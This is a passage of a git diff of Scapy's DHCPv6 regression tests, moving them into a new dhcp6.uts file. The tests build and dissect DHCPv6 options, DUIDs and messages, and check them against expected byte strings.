DHCP6OptClientFQDN - Basic Dissection -a = DHCP6OptClientFQDN(b"\x00'\x00\x01\x00") -a.optcode == 39 and a.optlen == 1 and a.res == 0 and a.flags == 0 and a.fqdn == b"." - -= DHCP6OptClientFQDN - Instantiation with various flags combinations -raw(DHCP6OptClientFQDN(flags="S")) == b"\x00'\x00\x02\x01\x00" and raw(DHCP6OptClientFQDN(flags="O")) == b"\x00'\x00\x02\x02\x00" and raw(DHCP6OptClientFQDN(flags="N")) == b"\x00'\x00\x02\x04\x00" and raw(DHCP6OptClientFQDN(flags="SON")) == b"\x00'\x00\x02\x07\x00" and raw(DHCP6OptClientFQDN(flags="ON")) == b"\x00'\x00\x02\x06\x00" - -= DHCP6OptClientFQDN - Instantiation with one fqdn -raw(DHCP6OptClientFQDN(fqdn="toto.example.org")) == b"\x00'\x00\x13\x00\x04toto\x07example\x03org\x00" - -= DHCP6OptClientFQDN - Dissection with one fqdn -a = DHCP6OptClientFQDN(b"\x00'\x00\x12\x00\x04toto\x07example\x03org\x00") -a.optcode == 39 and a.optlen == 18 and a.res == 0 and a.flags == 0 and a.fqdn == b"toto.example.org." - - -############ -############ -+ Test DHCP6 Option PANA Auth Agent - -= DHCP6OptPanaAuthAgent - Basic Instantiation -raw(DHCP6OptPanaAuthAgent()) == b'\x00(\x00\x00' - -= DHCP6OptPanaAuthAgent - Basic Dissection -a = DHCP6OptPanaAuthAgent(b"\x00(\x00\x00") -a.optcode == 40 and a.optlen == 0 and a.paaaddr == [] - -= DHCP6OptPanaAuthAgent - Instantiation with specific values (1 address) -raw(DHCP6OptPanaAuthAgent(paaaddr=["2001:db8::1"])) == b'\x00(\x00\x10 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' - -= DHCP6OptPanaAuthAgent - Dissection with specific values (1 address) -a = DHCP6OptPanaAuthAgent(b'\x00(\x00\x10 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') -a.optcode == 40 and a.optlen == 16 and len(a.paaaddr) == 1 and a.paaaddr[0] == "2001:db8::1" - -= DHCP6OptPanaAuthAgent - Instantiation with specific values (2 addresses) -raw(DHCP6OptPanaAuthAgent(paaaddr=["2001:db8::1", "2001:db8::2"])) == b'\x00(\x00 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02' - -= DHCP6OptPanaAuthAgent - Dissection with specific values (2 addresses) -a = DHCP6OptPanaAuthAgent(b'\x00(\x00 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02') -a.optcode == 40 and a.optlen == 32 and len(a.paaaddr) == 2 and a.paaaddr[0] == "2001:db8::1" and a.paaaddr[1] == "2001:db8::2" - - -############ -############ -+ Test DHCP6 Option - New POSIX Time Zone - -= DHCP6OptNewPOSIXTimeZone - Basic Instantiation -raw(DHCP6OptNewPOSIXTimeZone()) == b'\x00)\x00\x00' - -= DHCP6OptNewPOSIXTimeZone - Basic Dissection -a = DHCP6OptNewPOSIXTimeZone(b'\x00)\x00\x00') -a.optcode == 41 and a.optlen == 0 and a.optdata == b"" - -= DHCP6OptNewPOSIXTimeZone - Instantiation with specific values -raw(DHCP6OptNewPOSIXTimeZone(optdata="EST5EDT4,M3.2.0/02:00,M11.1.0/02:00")) == b'\x00)\x00#EST5EDT4,M3.2.0/02:00,M11.1.0/02:00' - -= DHCP6OptNewPOSIXTimeZone - Dissection with specific values -a = DHCP6OptNewPOSIXTimeZone(b'\x00)\x00#EST5EDT4,M3.2.0/02:00,M11.1.0/02:00') -a.optcode == 41 and a.optlen == 35 and a.optdata == b"EST5EDT4,M3.2.0/02:00,M11.1.0/02:00" - - -############ -############ -+ Test DHCP6 Option - New TZDB Time Zone - -= DHCP6OptNewTZDBTimeZone - Basic Instantiation -raw(DHCP6OptNewTZDBTimeZone()) == b'\x00*\x00\x00' - -= DHCP6OptNewTZDBTimeZone - Basic Dissection -a = DHCP6OptNewTZDBTimeZone(b'\x00*\x00\x00') -a.optcode == 42 and a.optlen == 0 and a.optdata == b"" - -= DHCP6OptNewTZDBTimeZone - Instantiation with specific values -raw(DHCP6OptNewTZDBTimeZone(optdata="Europe/Zurich")) == b'\x00*\x00\rEurope/Zurich' - -= DHCP6OptNewTZDBTimeZone - Dissection with specific values -a = DHCP6OptNewTZDBTimeZone(b'\x00*\x00\rEurope/Zurich') -a.optcode == 42 and a.optlen == 13 and a.optdata == b"Europe/Zurich" - - -############ -############ -+ Test DHCP6 Option Relay Agent Echo Request Option - -= DHCP6OptRelayAgentERO - Basic Instantiation -raw(DHCP6OptRelayAgentERO()) == b'\x00+\x00\x04\x00\x17\x00\x18' - -= DHCP6OptRelayAgentERO - optlen field computation -raw(DHCP6OptRelayAgentERO(reqopts=[1,2,3,4])) == b'\x00+\x00\x08\x00\x01\x00\x02\x00\x03\x00\x04' - -= DHCP6OptRelayAgentERO - instantiation with empty list -raw(DHCP6OptRelayAgentERO(reqopts=[])) == b'\x00+\x00\x00' - -= DHCP6OptRelayAgentERO - Basic dissection -a=DHCP6OptRelayAgentERO(b'\x00+\x00\x00') -a.optcode == 43 and a.optlen == 0 and a.reqopts == [23,24] - -= DHCP6OptRelayAgentERO - Dissection with specific value -a=DHCP6OptRelayAgentERO(b'\x00+\x00\x08\x00\x01\x00\x02\x00\x03\x00\x04') -a.optcode == 43 and a.optlen == 8 and a.reqopts == [1,2,3,4] - - -############ -############ -+ Test DHCP6 Option LQ Client Link - -= DHCP6OptLQClientLink - Basic Instantiation -raw(DHCP6OptLQClientLink()) == b'\x000\x00\x00' - -= DHCP6OptLQClientLink - Basic Dissection -a = DHCP6OptLQClientLink(b"\x000\x00\x00") -a.optcode == 48 and a.optlen == 0 and a.linkaddress == [] - -= DHCP6OptLQClientLink - Instantiation with specific values (1 address) -raw(DHCP6OptLQClientLink(linkaddress=["2001:db8::1"])) == b'\x000\x00\x10 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' - -= DHCP6OptLQClientLink - Dissection with specific values (1 address) -a = DHCP6OptLQClientLink(b'\x000\x00\x10 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') -a.optcode == 48 and a.optlen == 16 and len(a.linkaddress) == 1 and a.linkaddress[0] == "2001:db8::1" - -= DHCP6OptLQClientLink - Instantiation with specific values (2 addresses) -raw(DHCP6OptLQClientLink(linkaddress=["2001:db8::1", "2001:db8::2"])) == b'\x000\x00 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02' - -= DHCP6OptLQClientLink - Dissection with specific values (2 addresses) -a = DHCP6OptLQClientLink(b'\x000\x00 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02') -a.optcode == 48 and a.optlen == 32 and len(a.linkaddress) == 2 and a.linkaddress[0] == "2001:db8::1" and a.linkaddress[1] == "2001:db8::2" - -############ -############ -+ Test DHCP6 Option - Boot File URL - -= DHCP6OptBootFileUrl - Basic Instantiation -raw(DHCP6OptBootFileUrl()) == b'\x00;\x00\x00' - -= DHCP6OptBootFileUrl - Basic Dissection -a = DHCP6OptBootFileUrl(b'\x00;\x00\x00') -a.optcode == 59 and a.optlen == 0 and a.optdata == b"" - -= DHCP6OptBootFileUrl - Instantiation with specific values -raw(DHCP6OptBootFileUrl(optdata="http://wp.pl/file")) == b'\x00;\x00\x11http://wp.pl/file' - -= DHCP6OptBootFileUrl - Dissection with specific values -a = DHCP6OptBootFileUrl(b'\x00;\x00\x11http://wp.pl/file') -a.optcode == 59 and a.optlen == 17 and a.optdata == b"http://wp.pl/file" - - -############ -############ -+ Test DHCP6 Option - Client Arch Type - -= DHCP6OptClientArchType - Basic Instantiation -raw(DHCP6OptClientArchType()) -raw(DHCP6OptClientArchType()) == b'\x00=\x00\x00' - -= DHCP6OptClientArchType - Basic Dissection -a = DHCP6OptClientArchType(b'\x00=\x00\x00') -a.optcode == 61 and a.optlen == 0 and a.archtypes == [] - -= DHCP6OptClientArchType - Instantiation with specific value as just int -raw(DHCP6OptClientArchType(archtypes=7)) == b'\x00=\x00\x02\x00\x07' - -= DHCP6OptClientArchType - Instantiation with specific value as single item list of int -raw(DHCP6OptClientArchType(archtypes=[7])) == b'\x00=\x00\x02\x00\x07' - -= DHCP6OptClientArchType - Dissection with specific 1 value list -a = DHCP6OptClientArchType(b'\x00=\x00\x02\x00\x07') -a.optcode == 61 and a.optlen == 2 and a.archtypes == [7] - -= DHCP6OptClientArchType - Instantiation with specific value as 2 item list of int -raw(DHCP6OptClientArchType(archtypes=[7, 9])) == b'\x00=\x00\x04\x00\x07\x00\x09' - -= DHCP6OptClientArchType - Dissection with specific 2 values list -a = DHCP6OptClientArchType(b'\x00=\x00\x04\x00\x07\x00\x09') -a.optcode == 61 and a.optlen == 4 and a.archtypes == [7, 9] - - -############ -############ -+ Test DHCP6 Option - Client Network Inter Id - -= DHCP6OptClientNetworkInterId - Basic Instantiation -raw(DHCP6OptClientNetworkInterId()) -raw(DHCP6OptClientNetworkInterId()) == b'\x00>\x00\x03\x00\x00\x00' - -= DHCP6OptClientNetworkInterId - Basic Dissection -a = DHCP6OptClientNetworkInterId(b'\x00>\x00\x03\x00\x00\x00') -a.optcode == 62 and a.optlen == 3 and a.iitype == 0 and a.iimajor == 0 and a.iiminor == 0 - -= DHCP6OptClientNetworkInterId - Instantiation with specific values -raw(DHCP6OptClientNetworkInterId(iitype=1, iimajor=2, iiminor=3)) == b'\x00>\x00\x03\x01\x02\x03' - -= DHCP6OptClientNetworkInterId - Dissection with specific values -a = DHCP6OptClientNetworkInterId(b'\x00>\x00\x03\x01\x02\x03') -a.optcode == 62 and a.optlen == 3 and a.iitype == 1 and a.iimajor == 2 and a.iiminor == 3 - - -############ -############ -+ Test DHCP6 Option - ERP Domain - -= DHCP6OptERPDomain - Basic Instantiation -raw(DHCP6OptERPDomain()) == b'\x00A\x00\x00' - -= DHCP6OptERPDomain - Basic Dissection -a = DHCP6OptERPDomain(b'\x00A\x00\x00') -a.optcode == 65 and a.optlen == 0 and a.erpdomain == [] - -= DHCP6OptERPDomain - Instantiation with specific values (1 domain) -raw(DHCP6OptERPDomain(erpdomain=["toto.example.com."])) == b'\x00A\x00\x12\x04toto\x07example\x03com\x00' - -= DHCP6OptERPDomain - Dissection with specific values (1 domain) -a = DHCP6OptERPDomain(b'\x00A\x00\x12\x04toto\x07example\x03com\x00') -a.optcode == 65 and a.optlen == 18 and len(a.erpdomain) == 1 and a.erpdomain[0] == "toto.example.com." - -= DHCP6OptERPDomain - Instantiation with specific values (2 domains) -raw(DHCP6OptERPDomain(erpdomain=["toto.example.com.", "titi.example.com."])) == b'\x00A\x00$\x04toto\x07example\x03com\x00\x04titi\x07example\x03com\x00' - -= DHCP6OptERPDomain - Dissection with specific values (2 domains) -a = DHCP6OptERPDomain(b'\x00A\x00$\x04toto\x07example\x03com\x00\x04titi\x07example\x03com\x00') -a.optcode == 65 and a.optlen == 36 and len(a.erpdomain) == 2 and a.erpdomain[0] == "toto.example.com." and a.erpdomain[1] == "titi.example.com." - - -############ -############ -+ Test DHCP6 Option - Relay Supplied Option - -= DHCP6OptRelaySuppliedOpt - Basic Instantiation -raw(DHCP6OptRelaySuppliedOpt()) == b'\x00B\x00\x00' - -= DHCP6OptRelaySuppliedOpt - Basic Dissection -a = DHCP6OptRelaySuppliedOpt(b'\x00B\x00\x00') -a.optcode == 66 and a.optlen == 0 and a.relaysupplied == [] - -= DHCP6OptRelaySuppliedOpt - Instantiation with specific values -raw(DHCP6OptRelaySuppliedOpt(relaysupplied=DHCP6OptERPDomain(erpdomain=["toto.example.com."]))) == b'\x00B\x00\x16\x00A\x00\x12\x04toto\x07example\x03com\x00' - -= DHCP6OptRelaySuppliedOpt - Dissection with specific values -a = DHCP6OptRelaySuppliedOpt(b'\x00B\x00\x16\x00A\x00\x12\x04toto\x07example\x03com\x00') -a.optcode == 66 and a.optlen == 22 and len(a.relaysupplied) == 1 and isinstance(a.relaysupplied[0], DHCP6OptERPDomain) and a.relaysupplied[0].erpdomain[0] == "toto.example.com." - - -############ -############ -+ Test DHCP6 Option Client Link Layer address - -= Basic build & dissect -s = raw(DHCP6OptClientLinkLayerAddr()) -assert(s == b"\x00O\x00\x08\x00\x01\x00\x00\x00\x00\x00\x00") - -p = DHCP6OptClientLinkLayerAddr(s) -assert(p.clladdr == "00:00:00:00:00:00") - -r = b"\x00O\x00\x08\x00\x01\x00\x01\x02\x03\x04\x05" -p = DHCP6OptClientLinkLayerAddr(r) -assert(p.clladdr == "00:01:02:03:04:05") - - -############ -############ -+ Test DHCP6 Option Virtual Subnet Selection - -= Basic build & dissect -s = raw(DHCP6OptVSS()) -assert(s == b"\x00D\x00\x01\xff") - -p = DHCP6OptVSS(s) -assert(p.type == 255) - - -############ -############ -+ Test DHCP6 Messages - DHCP6_Solicit - -= DHCP6_Solicit - Basic Instantiation -raw(DHCP6_Solicit()) == b'\x01\x00\x00\x00' - -= DHCP6_Solicit - Basic Dissection -a = DHCP6_Solicit(b'\x01\x00\x00\x00') -a.msgtype == 1 and a.trid == 0 - -= DHCP6_Solicit - Basic test of DHCP6_solicit.hashret() -DHCP6_Solicit().hashret() == b'\x00\x00\x00' - -= DHCP6_Solicit - Test of DHCP6_solicit.hashret() with specific values -DHCP6_Solicit(trid=0xbbccdd).hashret() == b'\xbb\xcc\xdd' - -= DHCP6_Solicit - UDP ports overload -a=UDP()/DHCP6_Solicit() -a.sport == 546 and a.dport == 547 - -= DHCP6_Solicit - Dispatch based on UDP port -a=UDP(raw(UDP()/DHCP6_Solicit())) -isinstance(a.payload, DHCP6_Solicit) - - -############ -############ -+ Test DHCP6 Messages - DHCP6_Advertise - -= DHCP6_Advertise - Basic Instantiation -raw(DHCP6_Advertise()) == b'\x02\x00\x00\x00' - -= DHCP6_Advertise - Basic test of DHCP6_solicit.hashret() -DHCP6_Advertise().hashret() == b'\x00\x00\x00' - -= DHCP6_Advertise - Test of DHCP6_Advertise.hashret() with specific values -DHCP6_Advertise(trid=0xbbccdd).hashret() == b'\xbb\xcc\xdd' - -= DHCP6_Advertise - Basic test of answers() with solicit message -a = DHCP6_Solicit() -b = DHCP6_Advertise() -a > b - -= DHCP6_Advertise - Test of answers() with solicit message -a = DHCP6_Solicit(trid=0xbbccdd) -b = DHCP6_Advertise(trid=0xbbccdd) -a > b - -= DHCP6_Advertise - UDP ports overload -a=UDP()/DHCP6_Advertise() -a.sport == 547 and a.dport == 546 - - -############ -############ -+ Test DHCP6 Messages - DHCP6_Request - -= DHCP6_Request - Basic Instantiation -raw(DHCP6_Request()) == b'\x03\x00\x00\x00' - -= DHCP6_Request - Basic Dissection -a=DHCP6_Request(b'\x03\x00\x00\x00') -a.msgtype == 3 and a.trid == 0 - -= DHCP6_Request - UDP ports overload -a=UDP()/DHCP6_Request() -a.sport == 546 and a.dport == 547 - - -############ -############ -+ Test DHCP6 Messages - DHCP6_Confirm - -= DHCP6_Confirm - Basic Instantiation -raw(DHCP6_Confirm()) == b'\x04\x00\x00\x00' - -= DHCP6_Confirm - Basic Dissection -a=DHCP6_Confirm(b'\x04\x00\x00\x00') -a.msgtype == 4 and a.trid == 0 - -= DHCP6_Confirm - UDP ports overload -a=UDP()/DHCP6_Confirm() -a.sport == 546 and a.dport == 547 - - -############ -############ -+ Test DHCP6 Messages - DHCP6_Renew - -= DHCP6_Renew - Basic Instantiation -raw(DHCP6_Renew()) == b'\x05\x00\x00\x00' - -= DHCP6_Renew - Basic Dissection -a=DHCP6_Renew(b'\x05\x00\x00\x00') -a.msgtype == 5 and a.trid == 0 - -= DHCP6_Renew - UDP ports overload -a=UDP()/DHCP6_Renew() -a.sport == 546 and a.dport == 547 - - -############ -############ -+ Test DHCP6 Messages - DHCP6_Rebind - -= DHCP6_Rebind - Basic Instantiation -raw(DHCP6_Rebind()) == b'\x06\x00\x00\x00' - -= DHCP6_Rebind - Basic Dissection -a=DHCP6_Rebind(b'\x06\x00\x00\x00') -a.msgtype == 6 and a.trid == 0 - -= DHCP6_Rebind - UDP ports overload -a=UDP()/DHCP6_Rebind() -a.sport == 546 and a.dport == 547 - - -############ -############ -+ Test DHCP6 Messages - DHCP6_Reply - -= DHCP6_Reply - Basic Instantiation -raw(DHCP6_Reply()) == b'\x07\x00\x00\x00' - -= DHCP6_Reply - Basic Dissection -a=DHCP6_Reply(b'\x07\x00\x00\x00') -a.msgtype == 7 and a.trid == 0 - -= DHCP6_Reply - UDP ports overload -a=UDP()/DHCP6_Reply() -a.sport == 547 and a.dport == 546 - -= DHCP6_Reply - Answers - -assert not DHCP6_Reply(trid=0).answers(DHCP6_Request(trid=1)) -assert DHCP6_Reply(trid=1).answers(DHCP6_Request(trid=1)) - - -############ -############ -+ Test DHCP6 Messages - DHCP6_Release - -= DHCP6_Release - Basic Instantiation -raw(DHCP6_Release()) == b'\x08\x00\x00\x00' - -= DHCP6_Release - Basic Dissection -a=DHCP6_Release(b'\x08\x00\x00\x00') -a.msgtype == 8 and a.trid == 0 - -= DHCP6_Release - UDP ports overload -a=UDP()/DHCP6_Release() -a.sport == 546 and a.dport == 547 - - -############ -############ -+ Test DHCP6 Messages - DHCP6_Decline - -= DHCP6_Decline - Basic Instantiation -raw(DHCP6_Decline()) == b'\x09\x00\x00\x00' - -= DHCP6_Confirm - Basic Dissection -a=DHCP6_Confirm(b'\x09\x00\x00\x00') -a.msgtype == 9 and a.trid == 0 - -= DHCP6_Decline - UDP ports overload -a=UDP()/DHCP6_Decline() -a.sport == 546 and a.dport == 547 - - -############ -############ -+ Test DHCP6 Messages - DHCP6_Reconf - -= DHCP6_Reconf - Basic Instantiation -raw(DHCP6_Reconf()) == b'\x0A\x00\x00\x00' - -= DHCP6_Reconf - Basic Dissection -a=DHCP6_Reconf(b'\x0A\x00\x00\x00') -a.msgtype == 10 and a.trid == 0 - -= DHCP6_Reconf - UDP ports overload -a=UDP()/DHCP6_Reconf() -a.sport == 547 and a.dport == 546 - - -############ -############ -+ Test DHCP6 Messages - DHCP6_InfoRequest - -= DHCP6_InfoRequest - Basic Instantiation -raw(DHCP6_InfoRequest()) == b'\x0B\x00\x00\x00' - -= DHCP6_InfoRequest - Basic Dissection -a=DHCP6_InfoRequest(b'\x0B\x00\x00\x00') -a.msgtype == 11 and a.trid == 0 - -= DHCP6_InfoRequest - UDP ports overload -a=UDP()/DHCP6_InfoRequest() -a.sport == 546 and a.dport == 547 - - -############ -############ -+ Test DHCP6 Messages - DHCP6_RelayForward - -= DHCP6_RelayForward - Basic Instantiation -raw(DHCP6_RelayForward()) == b'\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' - -= DHCP6_RelayForward - Basic Dissection -a=DHCP6_RelayForward(b'\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') -a.msgtype == 12 and a.hopcount == 0 and a.linkaddr == "::" and a.peeraddr == "::" - -= DHCP6_RelayForward - Dissection with options -a = DHCP6_RelayForward(b'\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\x00\x04\x03\x01\x00\x00') -a.msgtype == 12 and DHCP6OptRelayMsg in a and isinstance(a.message, DHCP6_Request) - -= DHCP6_RelayForward - Advanced dissection -s = b'`\x00\x00\x00\x002\x11@\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02\x02#\x02#\x002\xf0\xaf\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\x00\x04\x01\x00\x00\x00' -p = IPv6(s) -assert DHCP6OptRelayMsg in p and isinstance(p.message, DHCP6_Solicit) - - -############ -############ -+ Test DHCP6 Messages - DHCP6OptRelayMsg - -= DHCP6OptRelayMsg - Basic Instantiation -raw(DHCP6OptRelayMsg(optcode=37)) == b'\x00%\x00\x04\x00\x00\x00\x00' - -= DHCP6OptRelayMsg - Basic Dissection -a = DHCP6OptRelayMsg(b'\x00\r\x00\x00') -a.optcode == 13 and a.optlen == 0 and isinstance(a.message, DHCP6) - -= DHCP6OptRelayMsg - Embedded DHCP6 packet Instantiation -raw(DHCP6OptRelayMsg(message=DHCP6_Solicit())) == b'\x00\t\x00\x04\x01\x00\x00\x00' - -= DHCP6OptRelayMsg - Embedded DHCP6 packet Dissection -p = DHCP6OptRelayMsg(b'\x00\t\x00\x04\x01\x00\x00\x00') -isinstance(p.message, DHCP6_Solicit) - - -############ -############ -+ Test DHCP6 Messages - DHCP6_RelayReply - -= DHCP6_RelayReply - Basic Instantiation -raw(DHCP6_RelayReply()) == b'\r\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' - -= DHCP6_RelayReply - Basic Dissection -a=DHCP6_RelayReply(b'\r\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') -a.msgtype == 13 and a.hopcount == 0 and a.linkaddr == "::" and a.peeraddr == "::" - - ############ ############ + Home Agent Address Discovery diff --git a/test/scapy/layers/dhcp6.uts b/test/scapy/layers/dhcp6.uts new file mode 100644 index 00000000000..a6255aca066 --- /dev/null +++ b/test/scapy/layers/dhcp6.uts @@ -0,0 +1,1425 @@ +% DHCPv6 regression tests for Scapy + +# More information at http://www.secdev.org/projects/UTscapy/ + +##################################################################### +##################################################################### +########################## DHCPv6 ########################## +##################################################################### +##################################################################### + + +############ +############ ++ Test DHCP6 DUID_LLT + += DUID_LLT basic instantiation +a=DUID_LLT() + += DUID_LLT basic build +raw(DUID_LLT()) == b'\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + += DUID_LLT build with specific values +raw(DUID_LLT(lladdr="ff:ff:ff:ff:ff:ff", timeval=0x11111111, hwtype=0x2222)) == b'\x00\x01""\x11\x11\x11\x11\xff\xff\xff\xff\xff\xff' + += DUID_LLT basic dissection +a=DUID_LLT(raw(DUID_LLT())) +a.type == 1 and a.hwtype == 1 and a.timeval == 0 and a.lladdr == "00:00:00:00:00:00" + += DUID_LLT dissection with specific values +a=DUID_LLT(b'\x00\x01""\x11\x11\x11\x11\xff\xff\xff\xff\xff\xff') +a.type == 1 and a.hwtype == 0x2222 and a.timeval == 0x11111111 and a.lladdr == "ff:ff:ff:ff:ff:ff" + + +############ +############ ++ Test DHCP6 DUID_EN + += DUID_EN basic instantiation +a=DUID_EN() + += DUID_EN basic build +raw(DUID_EN()) == b'\x00\x02\x00\x00\x017' + += DUID_EN build with specific values +raw(DUID_EN(enterprisenum=0x11111111, id="iamastring")) == b'\x00\x02\x11\x11\x11\x11iamastring' + += DUID_EN basic dissection +a=DUID_EN(b'\x00\x02\x00\x00\x017') +a.type == 2 and a.enterprisenum == 311 + += DUID_EN dissection with specific values +a=DUID_EN(b'\x00\x02\x11\x11\x11\x11iamarawing') +a.type == 2 and a.enterprisenum == 0x11111111 and a.id == b"iamarawing" + + +############ +############ ++ Test DHCP6 DUID_LL + += DUID_LL basic instantiation +a=DUID_LL() + += DUID_LL basic build +raw(DUID_LL()) == b'\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00' + += DUID_LL build with specific values +raw(DUID_LL(hwtype=1, lladdr="ff:ff:ff:ff:ff:ff")) == b'\x00\x03\x00\x01\xff\xff\xff\xff\xff\xff' + += DUID_LL basic dissection +a=DUID_LL(raw(DUID_LL())) +a.type == 3 and a.hwtype == 1 and a.lladdr == "00:00:00:00:00:00" + += DUID_LL with specific values +a=DUID_LL(b'\x00\x03\x00\x01\xff\xff\xff\xff\xff\xff') +a.hwtype == 1 and a.lladdr == "ff:ff:ff:ff:ff:ff" + + +############ +############ ++ Test DHCP6 DUID_UUID + += DUID_UUID basic instantiation +a=DUID_UUID() + += DUID_UUID basic build +raw(DUID_UUID()) == b"\0\x04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0" + += DUID_UUID build with specific values +raw(DUID_UUID(uuid="272adcca-138c-4e8d-b3f4-634e953128cf")) == \ + b"\x00\x04'*\xdc\xca\x13\x8cN\x8d\xb3\xf4cN\x951(\xcf" + += DUID_UUID basic dissection +a=DUID_UUID(raw(DUID_UUID())) +a.type == 4 and str(a.uuid) == "00000000-0000-0000-0000-000000000000" + += DUID_UUID with specific values +a=DUID_UUID(b"\x00\x04'*\xdc\xca\x13\x8cN\x8d\xb3\xf4cN\x951(\xcf") +a.type == 4 and str(a.uuid) == "272adcca-138c-4e8d-b3f4-634e953128cf" + + +############ +############ ++ Test DHCP6 Opt Unknown + += DHCP6 Opt Unknown basic instantiation +a=DHCP6OptUnknown() + += DHCP6 Opt Unknown basic build (default values) +raw(DHCP6OptUnknown()) == b'\x00\x00\x00\x00' + += DHCP6 Opt Unknown - len computation test +raw(DHCP6OptUnknown(data="shouldbe9")) == b'\x00\x00\x00\tshouldbe9' + + +############ +############ ++ Test DHCP6 Client Identifier option + += DHCP6OptClientId basic instantiation +a=DHCP6OptClientId() + += DHCP6OptClientId basic build +raw(DHCP6OptClientId()) == b'\x00\x01\x00\x00' + += DHCP6OptClientId instantiation with specific values +raw(DHCP6OptClientId(duid="toto")) == b'\x00\x01\x00\x04toto' + += DHCP6OptClientId instantiation with DUID_LL +raw(DHCP6OptClientId(duid=DUID_LL())) == b'\x00\x01\x00\n\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00' + += DHCP6OptClientId instantiation with DUID_LLT +raw(DHCP6OptClientId(duid=DUID_LLT())) == b'\x00\x01\x00\x0e\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + += DHCP6OptClientId instantiation with DUID_EN +raw(DHCP6OptClientId(duid=DUID_EN())) == b'\x00\x01\x00\x06\x00\x02\x00\x00\x017' + += DHCP6OptClientId instantiation with specified length +raw(DHCP6OptClientId(optlen=80, duid="somestring")) == b'\x00\x01\x00Psomestring' + += DHCP6OptClientId basic dissection +a=DHCP6OptClientId(b'\x00\x01\x00\x00') +a.optcode == 1 and a.optlen == 0 + += DHCP6OptClientId instantiation with specified length +raw(DHCP6OptClientId(optlen=80, duid="somestring")) == b'\x00\x01\x00Psomestring' + += DHCP6OptClientId basic dissection +a=DHCP6OptClientId(b'\x00\x01\x00\x00') +a.optcode == 1 and a.optlen == 0 + += DHCP6OptClientId dissection with specific duid value +a=DHCP6OptClientId(b'\x00\x01\x00\x04somerawing') +a.optcode == 1 and a.optlen == 4 and isinstance(a.duid, Raw) and a.duid.load == b'some' and isinstance(a.payload, DHCP6OptUnknown) + += DHCP6OptClientId dissection with specific DUID_LL as duid value +a=DHCP6OptClientId(b'\x00\x01\x00\n\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00') +a.optcode == 1 and a.optlen == 10 and isinstance(a.duid, DUID_LL) and a.duid.type == 3 and a.duid.hwtype == 1 and a.duid.lladdr == "00:00:00:00:00:00" + += DHCP6OptClientId dissection with specific DUID_LLT as duid value +a=DHCP6OptClientId(b'\x00\x01\x00\x0e\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +a.optcode == 1 and a.optlen == 14 and isinstance(a.duid, DUID_LLT) and a.duid.type == 1 and a.duid.hwtype == 1 and a.duid.timeval == 0 and a.duid.lladdr == "00:00:00:00:00:00" + += DHCP6OptClientId dissection with specific DUID_EN as duid value +a=DHCP6OptClientId(b'\x00\x01\x00\x06\x00\x02\x00\x00\x017') +a.optcode == 1 and a.optlen == 6 and isinstance(a.duid, DUID_EN) and a.duid.type == 2 and a.duid.enterprisenum == 311 and a.duid.id == b"" + + +############ +############ ++ Test DHCP6 Server Identifier option + += DHCP6OptServerId basic instantiation +a=DHCP6OptServerId() + += DHCP6OptServerId basic build +raw(DHCP6OptServerId()) == b'\x00\x02\x00\x00' + += DHCP6OptServerId basic build with specific values +raw(DHCP6OptServerId(duid="toto")) == b'\x00\x02\x00\x04toto' + += DHCP6OptServerId instantiation with DUID_LL +raw(DHCP6OptServerId(duid=DUID_LL())) == b'\x00\x02\x00\n\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00' + += DHCP6OptServerId instantiation with DUID_LLT +raw(DHCP6OptServerId(duid=DUID_LLT())) == b'\x00\x02\x00\x0e\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + += DHCP6OptServerId instantiation with DUID_EN +raw(DHCP6OptServerId(duid=DUID_EN())) == b'\x00\x02\x00\x06\x00\x02\x00\x00\x017' + += DHCP6OptServerId instantiation with specified length 